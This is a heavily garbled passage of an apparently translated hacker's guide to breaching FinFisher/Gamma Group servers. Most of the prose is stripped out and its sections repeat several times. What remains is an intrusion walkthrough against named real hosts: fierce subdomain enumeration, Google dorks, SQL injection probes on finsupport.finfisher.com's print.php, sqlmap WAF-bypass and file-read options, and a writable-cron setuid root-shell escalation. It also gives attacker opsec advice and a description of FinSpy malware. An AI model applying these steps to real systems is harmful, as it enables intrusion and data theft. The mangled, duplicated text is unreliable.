    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  6. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :

    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (   22, 53, 80, 443, 4111 (  -   ). 


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

